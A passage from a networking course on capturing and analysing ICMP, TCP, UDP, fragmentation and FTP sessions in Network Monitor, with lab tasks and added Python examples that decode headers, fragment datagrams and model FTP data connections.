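    """One-line summary in the style of an analyzer's Summary pane."""
    ip, payload = parse_ipv4(packet)
    proto = PROTOCOL_NAMES.get(ip.protocol, str(ip.protocol))
    line = f"{ip.src} -> {ip.dst} {proto} ttl={ip.ttl} id=0x{ip.identification:04x}"
    if ip.protocol == 1:
        icmp = parse_icmp(payload)
        line += f" {ICMP_TYPE_NAMES.get(icmp.type, 'type ' + str(icmp.type))} code={icmp.code}"
        if icmp.type == 3:
            line += f" ({UNREACHABLE_CODES.get(icmp.code, 'unknown')})"
    return line + ("" if ip.checksum_ok else " [BAD IP CHECKSUM]")


# Constructed sample: 20-byte IP header, 8-byte ICMP echo request header, 32-byte ping payload.
SAMPLE_PING = bytes.fromhex(
    "45 00 00 3c 12 34 00 00 80 01 c6 66 ac 10 0a 05 ac 10 00 01"   # IP, Rows One to Five
    "08 00 4d 5a 00 01 00 01"                                       # ICMP Type 8, Code 0
) + b"abcdefghijklmnopqrstuvwabcdefghi"

if __name__ == "__main__":
    print(describe(SAMPLE_PING))
```

Because the Header Checksum covers only the 20 header bytes, changing the TTL (as every router does) forces a recomputation; the parser reports a header whose TTL was altered without one as a bad checksum, which is the same thing Network Monitor flags when it shows a checksum mismatch.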
TASK 2D-1
Capturing and Identifying ICMP Messages
Setup: You are logged on to Windows Server 2003 as Administrator.
A command prompt and Network Monitor are running.
1. Begin a new capture.
2. Switch to the command prompt, and ping a valid IP address of another host in your subnet. Wait for the ping to finish, and then minimize the command prompt.
3. In Network Monitor, stop and view the capture.
4. Scroll down the packets captured to identify ICMP messages, or create an ICMP filter.
5. Analyze the captured frames to identify the ping process between your
computer and the host you pinged.
6. Compare the messages to the discussion, looking for the following:
a. Source IP Address.
b. Destination IP Address.
c. Type.
d. Code.
e. Payload for ping.
7. Save this capture as Valid_Ping.cap and close it. You are going to run
another capture.
8. Begin a new capture.
9. Switch to the command prompt, ping a known invalid IP address for your network, wait for the ping to finish, and minimize the command prompt. For instance, if you were to ping the address 208.18.24.2, you should receive a message indicating that the request timed out. Or, if you are on the 172.16.10.0 network, you might try to ping the address 172.16.10.201, as that address is unlikely to be in use on your network.
10. In Network Monitor, stop and view the capture.
11. Scroll down the packets captured to identify ICMP messages.
12. Analyze the captured frames, and compare them to the discussion, look-
ing for the following:
a. Source IP Address.
b. Destination IP Address.
c. Type.
d. Code.
13. Save this capture as icmpheader.cap and close.
Topic 2E
Capturing and Identifying TCP Headers
When investigating TCP/IP, you will find that TCP data is encapsulated in the IP datagram. Since you have already looked into the IP datagram itself, at this stage you will examine TCP further. In Figure 2-18, you can see the actual format of the TCP header. There are seven rows of information in the figure, with the critical ones for this discussion being the first five. Just as with IP, when a computer receives the TCP header, it will begin reading on Row One on the left side, bit by bit. Once it reads through Row One, it will read Row Two, and so on.
Figure 2-18: A TCP header with all fields shown.
Based on your network environment, you may not receive these ICMP messages.
To work with TCP further, refer to RFC 793.
Using Figure 2-18, we will move through the header, identifying the function of each area. After identifying the header fields, we will use Network Monitor to capture and analyze the TCP header.
Starting on Row One, on the left side is a field called Source Port Number. This field is a 16-bit number that defines the upper-layer application that is using TCP on the source host.
The second field on Row One is a field called Destination Port Number. This is a 16-bit field that defines the upper-layer application that is using TCP on the destination host. The combination of an IP address and a port number is often called a socket. A socket pair identifies both ends of a communication completely, by using the host IP address and port, and the destination IP address and port.
Moving on to Row Two, the entire row is a single field called Sequence Number. This is a 32-bit value that identifies the unique sequence number of this packet. The sequence numbers are used to track communication and are part of the reason TCP is considered a connection-oriented protocol.
In Row Three, you can see that the entire row is also a single field, called Acknowledgement Number. This is a 32-bit value that provides a response to a sequence number. Under normal operations, this value will be the value of the sequence number of the last packet received in this line of communication, plus 1. There will be a value in this field only if the ACK flag is turned on (flags are in the next row).
Continuing on to Row Four, starting on the left side is a field called Offset (sometimes also called Header Length). This is a 4-bit value that defines the size of the TCP header. Because this is a 4-bit value, the limit on the size of the header is 60 bytes. If there are no options set, the size of the header is 20 bytes.
Moving to the right is a field called Reserved. This is a 6-bit value that is always left at 0 for functioning hosts using TCP/IP. It is not used for any normal network traffic.
After the Reserved field are the six Control Flags. Each flag is only 1 bit, either on or off. The six control flags are listed as follows, in the left-to-right order they occupy in the TCP header:
URG: If this is a 1, the Urgent flag is set.
ACK: If this is a 1, the Acknowledgement flag is set.
PSH: If this is a 1, the Push flag is set.
RST: If this is a 1, the Reset flag is set.
SYN: If this is a 1, the Synchronize flag is set.
FIN: If this is a 1, the Finish flag is set.
For a detailed discussion on the flags and their functions, please review that section earlier in this lesson.
Following the Control Flags on Row Four is a field called Window Size. This is a 16-bit value that identifies the number of bytes, starting with the one defined in the Acknowledgement field, that the sender of this segment is willing to accept.
Moving on to Row Five, on the left side, there is a field called TCP Checksum. This is a 16-bit value that is used to provide an integrity check of the TCP header and the TCP data. The value is calculated by the sender and stored in the header; the receiver recalculates and compares the value upon receipt.
Following the TCP Checksum on Row Five is a field called Urgent Pointer. This is a 16-bit value that is used if the sender must send emergency information. The pointer points to the sequence number of the byte that follows the urgent data, and is only active if the URG flag has been set.
The Sixth Row has only one field, called Options. This is a 32-bit value that is often used to define a maximum segment size (MSS). MSS is used so the sender can inform the receiver of the maximum segment size that the sender is going to receive on return communication. In the event that the options set do not take up all 32 bits, padding will be added to fill the field.
The Seventh and final Row is the representation of the data. By this point, the header is complete and the data the user wants to send or receive is stored in the packet.
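As an added example (not part of the course, and not Network Monitor's code), the Python below decodes the Row One through Row Five TCP fields described above and then walks a constructed Telnet session one segment at a time, the way you do by hand in Tasks 2B-4 and 2B-5: it labels the three handshake frames and the four teardown frames, and checks that every ACK number equals the other side's next sequence number (the "plus 1" rule for SYN and FIN, plus the payload length for data). The ports, sequence numbers, window, and the five-byte payload are constructed; the TCP Checksum field is left at zero and is not validated, because TCP's checksum also covers an IP pseudo-header that this example does not build.

```python
"""Decode TCP headers and walk a constructed session: handshake, data, teardown (RFC 793).

Added example, not course material. Segments are constructed: client port 1045 to the
Telnet port (23); Window Size 0x4000; checksums left at 0 (not validated here).
"""
import struct
from dataclasses import dataclass
from typing import List, Tuple

# Row Four control flags, in the left-to-right order they occupy in the header.
FLAG_BITS = [("URG", 0x20), ("ACK", 0x10), ("PSH", 0x08),
             ("RST", 0x04), ("SYN", 0x02), ("FIN", 0x01)]


@dataclass
class TCPHeader:
    src_port: int
    dst_port: int
    seq: int
    ack: int
    data_offset: int    # header length in 32-bit words, 5 (20 bytes) to 15 (60 bytes)
    reserved: int       # the 6 bits between Offset and the flags; 0 on normal traffic
    flags: List[str]
    window: int
    checksum: int
    urgent_pointer: int
    options: bytes
    payload: bytes


def parse_tcp(segment: bytes) -> TCPHeader:
    if len(segment) < 20:
        raise ValueError("truncated TCP header")
    (src, dst, seq, ack, off_res, flag_byte, window, csum,
     urg) = struct.unpack("!HHIIBBHHH", segment[:20])
    offset = off_res >> 4
    if offset < 5 or len(segment) < offset * 4:
        raise ValueError(f"bad data offset {offset}")
    return TCPHeader(
        src_port=src, dst_port=dst, seq=seq, ack=ack, data_offset=offset,
        reserved=((off_res & 0x0F) << 2) | (flag_byte >> 6),
        flags=[name for name, bit in FLAG_BITS if flag_byte & bit],
        window=window, checksum=csum, urgent_pointer=urg,
        options=segment[20:offset * 4], payload=segment[offset * 4:])


def walk_session(segments: List[bytes]) -> List[Tuple[str, bool]]:
    """Label each segment and check its ACK against the peer's next sequence number.

    SYN and FIN each consume one sequence number and data consumes len(payload),
    so after a SYN with SEQ=x the peer must answer ACK=x+1.
    """
    next_seq = {}        # (src_port, dst_port) -> next sequence number that side will send
    results, prev = [], ""
    for raw in segments:
        h = parse_tcp(raw)
        fwd, rev, f = (h.src_port, h.dst_port), (h.dst_port, h.src_port), set(h.flags)
        if "ACK" in f:
            ack_ok = rev in next_seq and h.ack == next_seq[rev]
        else:
            ack_ok = h.ack == 0          # no ACK flag: the field carries no meaning
        if f == {"SYN"}:
            label = "handshake 1/3: SYN"
        elif f == {"SYN", "ACK"}:
            label = "handshake 2/3: SYN+ACK"
        elif f == {"ACK"} and prev.startswith("handshake 2/3"):
            label = "handshake 3/3: ACK"
        elif "RST" in f:
            label = "reset: " + "+".join(h.flags)
        elif "FIN" in f:
            label = "teardown: " + "+".join(h.flags)
        elif h.payload:
            label = f"data {len(h.payload)} bytes: " + "+".join(h.flags)
        else:
            label = "+".join(h.flags) or "no flags"
        next_seq[fwd] = h.seq + len(h.payload) + ("SYN" in f) + ("FIN" in f)
        results.append((label, ack_ok))
        prev = label
    return results


# Constructed Telnet session, 20-byte headers as hex: ports, SEQ, ACK, offset/flags, window, ...
SESSION = [bytes.fromhex(h) for h in (
    "0415 0017 00001000 00000000 50 02 4000 0000 0000",   # client SYN, SEQ=0x1000
    "0017 0415 00002000 00001001 50 12 4000 0000 0000",   # server SYN+ACK, ACK=0x1001
    "0415 0017 00001001 00002001 50 10 4000 0000 0000",   # client ACK, ACK=0x2001
    "0415 0017 00001001 00002001 50 18 4000 0000 0000 68656c6c6f",  # PSH+ACK, 5 bytes
    "0017 0415 00002001 00001006 50 10 4000 0000 0000",   # server ACK of the data
    "0415 0017 00001006 00002001 50 11 4000 0000 0000",   # teardown 1: client FIN+ACK
    "0017 0415 00002001 00001007 50 10 4000 0000 0000",   # teardown 2: server ACK
    "0017 0415 00002001 00001007 50 11 4000 0000 0000",   # teardown 3: server FIN+ACK
    "0415 0017 00001007 00002002 50 10 4000 0000 0000",   # teardown 4: client ACK
)]

if __name__ == "__main__":
    for label, ok in walk_session(SESSION):
        print(f"{label:32} ack {'consistent' if ok else 'INCONSISTENT'}")
```

The hex strings are laid out the way the Hex pane shows them: the byte 0x50 is Offset 5 (20 bytes, no options) followed by four reserved bits, and the next byte holds the six flags, so 0x02 is SYN alone, 0x12 is SYN+ACK, 0x10 is ACK, 0x18 is PSH+ACK, and 0x11 is FIN+ACK.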
TASK 2E-1
Capturing and Identifying TCP Headers
Setup: You are logged on to Windows Server 2003 as Administrator.
A command prompt and Network Monitor are running.
1. Begin a new capture.
2. Switch to the command prompt and initiate a Telnet session to a neigh-
boring host.
3. To begin the Telnet session, type y, and press Enter.
4. At the login prompt, type Administrator, leave the password blank, and
press Enter.
5. If the Telnet session starts, exit the Telnet session; otherwise, close the
command prompt.
6. Stop and view the capture.
7. Add a filter so that all you see are TCP frames. For the specific steps to add filters, see Task 2B-1, step 12 through step 16.
8. Analyze the TCP headers in the frames.
9. When analyzing the headers, look for the following:
a. Sequence Numbers.
b. Acknowledgement Numbers.
c. Source Port Numbers.
d. Destination Port Numbers.
10. Once you have analyzed the header, save the capture as Telnet_Attempt.cap
and close the capture le.
Topic 2F
Capturing and Identifying UDP Headers
Compared to TCP, UDP is a very simple transport protocol. The UDP header and data will be completely encapsulated in the IP datagram, just as with TCP. In Figure 2-19, you can see the actual format of the UDP header. There are three rows of information in the figure. Just as with TCP, when a computer receives the UDP header, it will begin reading on Row One on the left side, bit by bit. Once it reads through Row One, it will read Row Two, and so on.
Figure 2-19: A UDP header with all fields shown.
Using Figure 2-19, we will move through the header, identifying the function of each area. After identifying the header fields, we will use Network Monitor to capture and analyze the UDP header.
Starting on Row One, on the left side is a field called Source Port Number. This field is a 16-bit value that defines the upper-layer application that is using UDP on the source host.
The second field on Row One is called Destination Port Number. This field is a 16-bit value that defines the upper-layer application that is using UDP on the destination host.
On the Second Row, the field on the left is called UDP Length. This is a 16-bit value that identifies the length of the UDP data and the UDP header.
The second field on Row Two is a field called UDP Checksum. This is a 16-bit value that is used to provide an integrity check of the UDP header and the UDP data. The value is calculated by the sender, then stored, and the receiver compares the value upon receipt.
Row Three is where the actual user data is stored. It is possible for a user to send a UDP datagram with zero bytes of data.
TASK 2F-1
Working with UDP Headers
Setup: You are logged on to Windows Server 2003 as Administrator,
and Network Monitor is running.
1. Browse to C:\Tools\Lesson2. In that folder is a file called tftp.cap. Open tftp.cap in Network Monitor.
To work with UDP further, refer to RFC 768.
2. Expand the details of any UDP frame, and compare it to the discussion.
Look for the following:
a. Source Port.
b. Destination Port.
c. What the actual UDP data is.
3. As you are analyzing this traffic, verify that no session was established, as
UDP is connectionless.
4. Close the capture.
Topic 2G
Analyzing Packet Fragmentation
Packet-switched networks will all, at one time or another, experience fragmentation. This is due to the fact that all complex networks are made up of various physical media and configurations. So, a packet of a certain size might fit fine on one segment, but may suddenly be many times larger than the capacity of the next segment. The size limit that is allowed to exist on a network varies from network to network and is referred to as the Maximum Transmission Unit (MTU).
In the event that a datagram gets fragmented, it is not reassembled until it reaches its final destination. When the datagram is fragmented, each fragment becomes its own unique packet, transmitted and received uniquely.
TCP segments are sent using IP datagrams. TCP expects a one-to-one ratio of segments to datagrams. Therefore, IP on the receiving end must completely reassemble the datagram before handing the segment to TCP. In the relationship between TCP and IP, the following rules that affect fragmentation are defined:
The TCP Maximum Segment Size (MSS) is the IP Maximum Datagram Size minus 40 octets.
The default IP Maximum Datagram Size is 576 octets.
The default TCP Maximum Segment Size is 536 octets.
Fragmentation will rarely happen at the source of a datagram, but it is possible. One example would be a receiving host that says it can accept segments many times larger than what the sender normally sends. Another example would be a host on a small-packet-sized network, such as PPP, using an application with a fixed-size message.
The common location for fragmentation, then, is at a gateway, where the odds of different MTUs on different interfaces are very high. The following list shows the MTU for various media:
PPP: 296 bytes
Ethernet: 1500 bytes
FDDI: 4352 bytes
Token Ring (4 MB/s): 4464 bytes
Token Ring (16 MB/s): 17914 bytes
The official minimum MTU is 68, and the maximum is 65535.
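The rules above are easiest to see in code: every fragment keeps the original Identification, every fragment except the last carries a multiple of 8 data bytes and sets MF, the Fragment Offset counts 8-byte units, and nothing is reassembled before the final destination. The Python below is an added example, not course material and not Network Monitor's code. It builds a constructed UDP datagram (the Topic 2F header layout, with the zero checksum that UDP over IPv4 permits), fragments it for the 576-byte default datagram size and for the 296-byte PPP MTU from the list, and reassembles the pieces, refusing gaps, overlaps, or a missing last fragment. The addresses, ports, payload, and Identification value are constructed. It also shows that the UDP port numbers are present only in the first fragment, which is why a filter keyed on ports cannot classify later fragments of the same datagram.

```python
"""Fragment an IPv4 datagram for a smaller MTU and reassemble it (RFC 791 rules).

Added example, not course material. The UDP datagram is constructed; the checksum
helper follows RFC 1071; headers with IP options are not handled.
"""
import struct
from typing import List, Optional, Tuple

IP_DF = 0x4000     # Row Two, Flags: Don't Fragment
IP_MF = 0x2000     # Row Two, Flags: More Fragments
OFFSET_MASK = 0x1FFF


def internet_checksum(data: bytes) -> int:
    if len(data) % 2:
        data += b"\x00"
    total = sum(int.from_bytes(data[i:i + 2], "big") for i in range(0, len(data), 2))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def rewrite_header(header: bytes, total_len: int, flags_frag: int) -> bytes:
    """Copy a 20-byte header with new Total Length, Flags/Offset, and a fresh checksum."""
    h = bytearray(header)
    struct.pack_into("!H", h, 2, total_len)
    struct.pack_into("!H", h, 6, flags_frag)
    struct.pack_into("!H", h, 10, 0)
    struct.pack_into("!H", h, 10, internet_checksum(bytes(h)))
    return bytes(h)


def build_ipv4(src: str, dst: str, proto: int, ident: int, payload: bytes,
               ttl: int = 128, df: bool = False) -> bytes:
    """Options-free IPv4 header (IHL=5) in front of `payload`."""
    def addr(s: str) -> bytes:
        return bytes(int(o) for o in s.split("."))
    flags_frag = IP_DF if df else 0
    header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), ident,
                         flags_frag, ttl, proto, 0, addr(src), addr(dst))
    return rewrite_header(header, 20 + len(payload), flags_frag) + payload


def build_udp(src_port: int, dst_port: int, data: bytes) -> bytes:
    """UDP header from Topic 2F; checksum 0 means 'not computed', allowed over IPv4."""
    return struct.pack("!HHHH", src_port, dst_port, 8 + len(data), 0) + data


def ip_fields(packet: bytes) -> Tuple[int, int, int, bool, bool, int]:
    """(header_len, total_len, ident, df, mf, fragment_offset in 8-byte units)."""
    ver_ihl, _tos, total_len, ident, flags_frag = struct.unpack("!BBHHH", packet[:8])
    return ((ver_ihl & 0x0F) * 4, total_len, ident,
            bool(flags_frag & IP_DF), bool(flags_frag & IP_MF), flags_frag & OFFSET_MASK)


def fragment(datagram: bytes, mtu: int) -> List[bytes]:
    """Split `datagram` the way a gateway does when its outgoing MTU is too small."""
    hlen, total_len, _, df, mf, base_offset = ip_fields(datagram)
    if hlen != 20:
        raise ValueError("IP options are not handled in this example")
    if total_len <= mtu:
        return [datagram]                      # fits: no fragmentation needed
    if df:
        # A real gateway drops the datagram and sends ICMP Type 3 Code 4 to the source.
        raise ValueError("DF bit set: datagram cannot be fragmented")
    header, data = datagram[:hlen], datagram[hlen:total_len]
    step = (mtu - hlen) // 8 * 8               # all but the last fragment: multiple of 8
    if step <= 0:
        raise ValueError("MTU too small to carry any data")
    fragments = []
    for start in range(0, len(data), step):
        chunk = data[start:start + step]
        last = start + len(chunk) == len(data)
        flags_frag = (IP_MF if (mf or not last) else 0) | (base_offset + start // 8)
        fragments.append(rewrite_header(header, hlen + len(chunk), flags_frag) + chunk)
    return fragments


def reassemble(fragments: List[bytes]) -> bytes:
    """Rebuild the datagram at the final destination; strict about gaps and overlaps."""
    pieces = []
    for frag in fragments:
        hlen, total_len, ident, _, mf, offset = ip_fields(frag)
        pieces.append((offset * 8, frag[hlen:total_len], mf, ident, frag[:hlen]))
    if len({p[3] for p in pieces}) != 1:
        raise ValueError("fragments carry different Identification values")
    pieces.sort(key=lambda p: p[0])
    data = b""
    for start, chunk, _, _, _ in pieces:
        if start != len(data):                 # a hole, or an overlapping fragment
            raise ValueError(f"fragment at byte {start} does not fit (have {len(data)})")
        data += chunk
    if pieces[-1][2]:
        raise ValueError("last fragment still has MF set: datagram incomplete")
    first_header = pieces[0][4]
    return rewrite_header(first_header, len(first_header) + len(data), 0) + data


def udp_ports(frag: bytes) -> Optional[Tuple[int, int]]:
    """Port numbers live in the UDP header, which only the first fragment carries."""
    hlen, total_len, _, _, _, offset = ip_fields(frag)
    if offset != 0 or total_len - hlen < 8:
        return None
    return struct.unpack("!HH", frag[hlen:hlen + 4])


# Constructed datagram: 1200 data bytes to the TFTP port, 1228 bytes in all (fits Ethernet).
SAMPLE_DATAGRAM = build_ipv4("172.16.10.5", "172.16.10.9", 17, 0x1234,
                             build_udp(1060, 69, bytes(range(256)) * 4 + bytes(176)))

if __name__ == "__main__":
    for f in fragment(SAMPLE_DATAGRAM, 576):
        _, tlen, ident, _, mf, off = ip_fields(f)
        print(f"id=0x{ident:04x} len={tlen} offset={off} MF={int(mf)} ports={udp_ports(f)}")
```

For the 576-byte case the three fragments carry 552, 552, and 104 data bytes at offsets 0, 69, and 138 (in 8-byte units), with MF set on the first two, which is the pattern you trace by hand in Task 2G-1. The reassembler rejects overlapping or missing pieces rather than guessing, the same conservative behaviour a perimeter device should have when it reassembles before inspecting.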
Figure 2-20: How fragmentation works.
TASK 2G-1
Analyzing Fragmentation
Setup: You are logged on to Windows Server 2003 as Administrator,
and Network Monitor is running.
1. Navigate to C:\Tools\Lesson2 and open fragment.cap in Network
Monitor.
2. Expand the details of frame 1, looking for the Fragment flag.
3. Observe that, in frame 1, there is no Fragment Offset, as this is the rst
fragment.
4. Select several consecutive frames. Observe that each successive frame has
a higher Fragment Offset as it gets farther from the beginning of the original
datagram.
5. Observe that the IP ID stays constant for each fragment.
6. Expand the details of frame 16.
7. Observe that the Fragment flags are now both 0, indicating this is the last of the fragments.
8. Close the capture.
Topic 2H
Analyzing an Entire Session
Now that you have analyzed IP, TCP, UDP, ICMP, fragmentation, handshakes, and teardowns, it is time to put them together. In this topic, you will follow along using two sample captures that were made specifically for this purpose. One capture is a PING capture, and the other is an FTP capture. By analyzing them, you will see how TCP/IP functions, from start to finish.
About the Tasks
In the following tasks, Windows Server 2003 Network Monitor was used to capture a ping between two hosts and an ftp session between two hosts. The ping and ftp commands were run from the command prompt, and the output saved to the text files ping.txt and ftp.txt, respectively. The Network Monitor captures were saved to the files ping.cap and ftp.cap, respectively. You can open the TXT files with Notepad to see the commands and responses. You can open the CAP files with Network Monitor and see the frames captured as a result. Let's take a look.
TASK 2H-1
Performing a Complete ICMP Session Analysis
Objective: To use the supplied capture and text files to examine the TCP/IP headers, in order to understand how a session is set up, used, and torn down.
Setup: You are logged on to Windows Server 2003 as Administrator,
and Network Monitor is running.
1. Start Notepad and open the file ping.txt. This file is in C:\Tools\Lesson2. You should see the output shown in the following graphic.
2. Keep this file open.
3. Switch to Network Monitor, and open the file ping.cap. It's also located in C:\Tools\Lesson2.
4. Observe that frame 1 is an ARP request, sent as an Ethernet broadcast, trying to resolve the target IP address to its MAC address.
5. Observe that frame 2 is the ARP reply from the target machine with the appropriate resolution. From now on, the two hosts can communicate.
6. Observe the next two frames. They are ICMP echo messages going back and
forth between the two hosts, corresponding to the output in the text le.
Examine the ICMP messages, and see the details in frames 3 and 4 as
shown in the following graphics.
7. Observe that, for the ping command, no session was set up or torn down; there is just a simple ICMP echo request, followed by an ICMP echo reply.
8. Close ping.cap and ping.txt.
Continuing the Complete Session Analysis
In the last task, one host successfully pinged another, in preparation for establishing an FTP transaction. We'll look at the FTP portion of the session, but before we do, a quick differentiation between active and passive FTP is in order.
FTP Communication
Up to this point you have been examining ICMP communication. Now you will
examine an active FTP session. There are two different types of FTP, something
that many administrators are unfamiliar with. The two FTP types are simply
called passive and active.
The mode most people think of as FTP is active FTP. In active FTP, the client opens the control connection from a port higher than 1024 (we'll call it X) to port 21 on the server, and the FTP command and control session is established. Before a transfer, the client tells the server, with the PORT command, which port it is listening on for data; in the classic case this is the next port up, X+1. The server then opens the data connection itself, from its port 20 to the client's port X+1, and sends the data over it.
In passive mode FTP, the client initiates both connections. When the FTP client begins a session, it opens two ports (again one higher than 1024, and the next port higher, or X and X+1). The first connection, from client port X, is the control session to server port 21. When the client sends the PASV command, the server opens a random high port (again higher than 1024, referred to as Y in this section) and reports it back to the client in its 227 reply. The client then opens the data connection from client port X+1 to server port Y.
When active FTP is used, there is a situation that firewalls dislike. The first part of the FTP session, from client to server, is not a problem. However, when the server connects back to the client from port 20, a firewall protecting the client sees a new inbound session from an untrusted network trying to reach a high port on the private network. Passive FTP solves this problem on the client-side firewall, because both connections originate from the FTP client and no session starts from the untrusted network.
There is a different problem with passive FTP. This problem is not on the firewall, but on the server configuration itself. Because the FTP client starts both connections, the FTP server must be able to accept the data connection on any high port, meaning the whole high-port range must be open and available in front of the server. To deal with this situation, many FTP servers now include an option that limits the range of passive ports the server hands out, so that only that range needs to be opened, and a firewall that reads the 227 reply on the control channel can open just the one port it names.
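The active/passive distinction above is exactly what a stateful firewall has to work out by reading the control channel. The following Python example is added here (it is not from the course) to make that concrete: it parses a PORT command or a 227 reply, decides which side opens the data connection and between which sockets, and renders the single rule the firewall would need. The dialogues are constructed; the client ports X=2025 and X+1=2026 and the server ports 21 and 20 follow the text, while the passive server port Y=49152 and the client-side "X+1" convention are assumptions (a real client may use any free port).

```python
"""Which side opens the FTP data connection, and between which sockets.

Added example for this section; it is not part of the course materials.
The control-channel dialogues below are constructed. Client ports 2025/2026
and server ports 21/20 follow the text; the passive server port 49152 is an
assumed value. A firewall that tracks FTP performs this same parsing so it can
open only the one data port a session actually uses."""
import re

FTP_CTRL_PORT = 21
FTP_DATA_PORT = 20
_HOST_PORT = re.compile(r"(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})")


def parse_host_port(text):
    """Decode the h1,h2,h3,h4,p1,p2 tuple used by PORT and by the 227 reply."""
    m = _HOST_PORT.search(text)
    if not m:
        raise ValueError("no host,port tuple in %r" % text)
    n = [int(x) for x in m.groups()]
    if max(n) > 255:
        raise ValueError("field out of range in %r" % text)
    return ".".join(map(str, n[:4])), n[4] * 256 + n[5]


def data_connection(client_ip, client_port, server_ip, ctrl_lines):
    """Walk the control dialogue and describe the resulting data connection.

    Returns the mode, which side initiates, the source and destination
    sockets, and whether a firewall in front of the client would see a new
    inbound connection (the case the text says firewalls dislike)."""
    for line in ctrl_lines:
        if line.upper().startswith("PORT "):
            host, port = parse_host_port(line)
            # Active mode: the server connects back from port 20 to the socket
            # the client announced. A PORT naming some other host would make the
            # server connect to a third party, so refuse it.
            if host != client_ip:
                raise ValueError("PORT names %s but the client is %s" % (host, client_ip))
            return {"mode": "active", "initiator": "server",
                    "src": (server_ip, FTP_DATA_PORT), "dst": (host, port),
                    "inbound_to_client": True}
        if line.startswith("227"):
            host, port = parse_host_port(line)
            # Passive mode: the client connects from X+1 (the text's convention)
            # to the socket the server announced in its reply.
            if host != server_ip:
                raise ValueError("227 reply names %s but the server is %s" % (host, server_ip))
            return {"mode": "passive", "initiator": "client",
                    "src": (client_ip, client_port + 1), "dst": (host, port),
                    "inbound_to_client": False}
    raise ValueError("dialogue contains neither PORT nor a 227 reply")


def firewall_rule(conn):
    """Render the single stateful rule the data connection needs."""
    (sip, sport), (dip, dport) = conn["src"], conn["dst"]
    return "permit tcp host %s eq %d host %s eq %d (opened by %s)" % (
        sip, sport, dip, dport, conn["initiator"])


# Constructed dialogues, client commands and server replies interleaved.
ACTIVE_DIALOGUE = ["USER test user", "331 Password required", "PASS plaintext",
                   "230 User logged in", "PORT 172,16,30,2,7,234",
                   "200 PORT command successful", "LIST"]
PASSIVE_DIALOGUE = ["USER test user", "331 Password required", "PASS plaintext",
                    "230 User logged in", "PASV",
                    "227 Entering Passive Mode (172,16,30,1,192,0)", "LIST"]

if __name__ == "__main__":
    for dialogue in (ACTIVE_DIALOGUE, PASSIVE_DIALOGUE):
        conn = data_connection("172.16.30.2", 2025, "172.16.30.1", dialogue)
        print(conn["mode"], firewall_rule(conn),
              "inbound to client:", conn["inbound_to_client"])
```

In the active case the rule that results is a connection from the server's port 20 into the client's 2026, initiated from outside, which is the inbound session a simple packet filter would drop; in the passive case both connections leave the client. The host check on PORT is what stops a client from directing the server's data connection at a third machine.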
TASK 2H-2
Performing a Complete FTP Session Analysis
Objective: To use the supplied capture and text files to examine the TCP/IP headers, in order to understand how a session is set up, used, and torn down.
Setup: You are logged on to Windows Server 2003 as Administrator.
Notepad and Network Monitor are running.
1. Switch to Notepad and open ftp.txt. This file is located in C:\Tools\Lesson2. You should see the results shown in the following graphic.
2. Observe that, in this session, when the ftp server asks for a password, the
user enters it but it is not recorded on screen.
3. Switch to Network Monitor, and open ftp.cap in C:\Tools\Lesson2. You
should see results similar to those shown in the following graphics. (Depend-
ing on the version of Network Monitor you are using, MAC and IP
addresses might be displayed in Hex, and the time might be in a different
format.)
There are 51 frames involved in this capture.
4. If you would like to change the color of the FTP packets for easier viewing, choose Display > Colors. Scroll down and select FTP; then, from the Background drop-down list, select a mild color such as gray or teal, and click OK. If you select a darker color, it might make it more difficult to read the text.
If you would like to change the format of the addresses from Hex to more readable names, choose Display > Addresses, and click Add. In the box that is displayed, enter FTPSITE for the Name, add 002B32CFC72 for the Address, verify that the Type is Ethernet, and click OK. Click Add again, then enter LOCAL for the Name, add 0002B32C5B13 for the Address, verify that the Type is Ethernet, and click OK twice.
5. Observe that frames 3, 4, and 5 represent the TCP handshake involved in establishing the session. Frames shaded gray (6, 8-9, 11-12, 14, 16-19, 23, 29, 31-34, 38, 44, and 46-47) are all directly involved with the ftp application: authentication, ftp requests for directory information, an actual file transfer, followed by a quit, and bye response.
6. Observe that in frame 8, you can see the user name being supplied.
7. Observe that in frame 9, you can see the request for a password.
8. Observe that in frame 11, you can see the password being supplied. Isn't this reason enough to protect authentication with encryption, rather than sending it in cleartext for any sniffer on the path to read?
9. Let's view the three-way handshake frames in a bit more detail.
Frame 3 starts the three-way handshake (the Active Open) by setting the SYN bit to 1, using source port 2025 (07E9 in hex), while at the same time directing the request to port 21 (15 in hex) on the server. An initial sequence number of 2052360112 (7A5487B0 in hex) is chosen for this direction of the connection; everything the client sends is numbered relative to it, and an unpredictable choice makes it hard for an off-path attacker to inject segments into the session.
10. Let's look at the reply.
The reply from the ftp server in frame 4 includes an ACK, while simultaneously including a SYN: it acknowledges the client's sequence number and supplies the server's own initial sequence number. The server side of this exchange is the Passive Open; it was already listening on port 21 when the client's SYN arrived.
11. Observe that frame 5 includes an ACK from the client.
Once the session is established, FTP can continue on with its setup. This includes a login and a password (to be supplied if anonymous access is not supported), followed by file requests.
12. Observe that frame 6 shows the ftp server asking for user identification. Frame 8 shows the ftp client supplying the user name of test user.
13. Observe that this is met by the ftp server asking for the password in frame
9.
14. Observe that in frame 11, you can see the password being offered. Because
no secure methods for authentication were set up, you can see the actual
password (the word plaintext).
15. Observe that once the user has been authenticated, the ftp session is allowed
to continue. The ftp server puts out the welcome message shown in frame
12.
16. Observe that the rest of the frames dealing with FTP (frames 14, 16-19, 23, 29, 31-34, 38, and 44) have to do with directory listings and file transfers. Each listing and transfer runs over its own data connection, so a separate three-way handshake precedes it.
17. Observe that in frame 38, you can see the actual contents of the file as it is being transferred. In this case, because it is just a text file, you can read the contents.
18. Observe that in frame 46, you can see the client attempt to close the connec-
tion with the Quit command.
19. Observe that in frame 47, you can see the server communicate with the cli-
ent with the message See ya later.
20. Observe that these messages are followed by TCP terminating the session
from both ends in frames 48 and 49, and 50 and 51, respectively, where the
FIN bits are set to 1 and the corresponding frame contains the ACK bit set
to 1.
21. Close Network Monitor. If you are prompted to save addresses, click No.
22. Close Notepad.
